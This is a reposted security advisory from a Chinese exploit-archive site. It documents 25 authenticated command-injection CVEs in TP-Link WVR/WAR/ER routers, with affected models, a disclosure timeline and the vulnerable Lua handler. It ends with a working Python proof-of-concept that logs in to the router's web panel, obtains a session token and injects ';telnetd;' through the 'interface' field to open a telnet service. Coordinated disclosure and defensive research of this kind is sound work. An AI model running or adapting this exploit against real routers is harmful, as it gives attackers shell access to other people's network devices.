首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TP-Link Remote Command Injection
来源:https://github.com/chunibalon/ 作者:puzzor 发布时间:2018-01-11  
Introduction:
================
The WVR-, WAR- and ER- products are the SOHO/WIFI routers of TP-Link.
These issues allow remote authenticated administrators to execute arbitrary commands via command injection through different variables of different lua files. 
If the attacker obtains the account and password of the router, then he can execute the arbitrary command through this command injection vulnerability. 
These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled).


Vulnerability Type:
================
Command Injection (Authenticated)


Product:
================
We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306).
And the following model should also be affected and the vendor has confirmed:
TP-Link ER5110G,
TP-Link ER5120G,
TP-Link ER5510G,
TP-Link ER5520G,
TP-Link R4149G,
TP-Link R4239G,
TP-Link R4299G,
TP-Link R473GP-AC,
TP-Link R473G,
TP-Link R473P-AC,
TP-Link R473,
TP-Link R478G+,
TP-Link R478,
TP-Link R478+,
TP-Link R483G,
TP-Link R483,
TP-Link R488,
TP-Link WAR1300L,
TP-Link WAR1750L,
TP-Link WAR2600L,
TP-Link WAR302,
TP-Link WAR450L,
TP-Link WAR450,
TP-Link WAR458L,
TP-Link WAR458,
TP-Link WAR900L,
TP-Link WVR1300G,
TP-Link WVR1300L,
TP-Link WVR1750L,
TP-Link WVR2600L,
TP-Link WVR300,
TP-Link WVR302,
TP-Link WVR4300L,
TP-Link WVR450L,
TP-Link WVR450,
TP-Link WVR458L,
TP-Link WVR900G,
TP-Link WVR900L


CVE details:
================
The detail of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file


Credits:
================
chunibalon, puzzor @VARAS of IIE


Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all effected products have been fixed.


Vulnerability detail:
================
These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616. 
Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file.

In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:
***********************************
function add_phddns(http_form)
    local form_data = json.decode(http_form.data)
    local jdata = form_data.params.new

    ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)

    if not ret then
        return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
    end

    if not uci_r:commit(CONFIG_NAME) then
        return false, err.ERR_COM_UCI_COMMIT
    end

        -- add the ref of interface
    ifs.update_if_reference(jdata.interface, 1)

    sys.fork_exec('/etc/init.d/phddns restart')
    userconfig.cfg_modify()

    return jdata
end
***********************************
This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns". 
The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently. 
Then the malformed value of "interface" argument causes the command injection vulnerability.


PoC file:
================
***********************************
import requests
import urllib
import json


# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'

PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
BASEURL = 'http://192.168.123.1'
LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'


MARK = '###'
VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)

headers = {
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
    "Connection": "keep-alive",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Host": BASEURL[7:],
    "Origin": BASEURL,
    "Referer": "%s/webpages/login.html" % (BASEURL),
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
    "X-Requested-With": "XMLHttpRequest"
}

login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}}
login_data = {'data':json.dumps(login_data_value)}
s = requests.Session()
s.headers.update(headers)
print (LOGINURL)
print (login_data)
res = s.post(LOGINURL, data=login_data)
stok = eval(res.text)['result']['stok']
print '[*] stok is %s' % (stok)

tmp_vul = VULURL.replace(MARK, stok)
print '[*] vul_url is %s ' % (tmp_vul)

delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}}
delete_data = {'data': json.dumps(delete_data)}
print '[+] delete existed rule'
res = s.post(tmp_vul, data=delete_data)
print '[*] response is: %s' % (res.text)

# after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;'''
vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}

vul_data = {'data': json.dumps(vul_data)}
print '[+] sending payload'
res = s.post(tmp_vul, data=vul_data)
print '[*] response is: %s' % (res.text)
***********************************


Reference:
================
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Polygonize PC 1.1 Remote Comma
·phpCollab 2.5.1 Unauthenticate
·Jungo Windriver 12.5.1 - Privi
·Microsoft Edge Chakra JIT - 'L
·DiskBoss Enterprise 8.8.16 - B
·HPE iMC dbman RestoreDBase Una
·HPE iMC dbman RestartDB Unauth
·Synology Photostation 6.7.2-34
·Commvault Communications Servi
·Microsoft Windows - 'nt!NtQuer
·Microsoft Windows - 'nt!NtQuer
·Microsoft Edge Chakra JIT - Es
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved